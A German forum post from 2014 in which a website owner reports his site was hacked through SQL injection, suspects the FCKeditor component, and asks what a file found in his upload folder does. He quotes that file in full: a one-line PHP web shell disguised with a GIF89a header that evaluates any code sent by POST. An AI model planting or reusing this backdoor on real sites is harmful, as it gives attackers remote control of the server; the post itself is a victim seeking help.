Thema: Seite gehackt
Einzelnen Beitrag anzeigen
  #1  
Alt 28.12.2014, 14:37:18
Heinrich Heinrich ist offline
Member
 
Registriert seit: Feb 2006
Beiträge: 883
Heinrich befindet sich auf einem aufstrebenden Ast
Seite gehackt

Hallo,

ich habe lange beim Webseitenbasteln pausiert, bis ich vom Provider eine Mitteilung bekam, dass meine Seite auf einer Liste des BSI mit gehackten Webseiten steht. Ging um SQL-Injection. Also - die letzten Tage mehr Sicherungen eingebaut (URL-Parameter kontrollieren usw) und hoffen, dass es jetzt dicht ist...

Jetzt zwei Fragen:

1. In den userfiles fand ich fremde php-Dateien mit dem einzigen Inhalt
PHP-Code:
GIF89a?lovealihack <?php eval($_POST[alihackxx])?>
Was eval() ist, weiß ich. Aber was macht man mit so'ner Datei?

2. Mein Eindruck ist, dass das "Loch" in der Webseite beim FCKeditor war. (Der ist Bestandteil meines CMS). Hat jemand Erfahrung mit Sicherheitslücken bei Webeditoren und eine Empfehlung? (Werde parallel mal googeln).

Danke schon mal für Tipps!
Mit Zitat antworten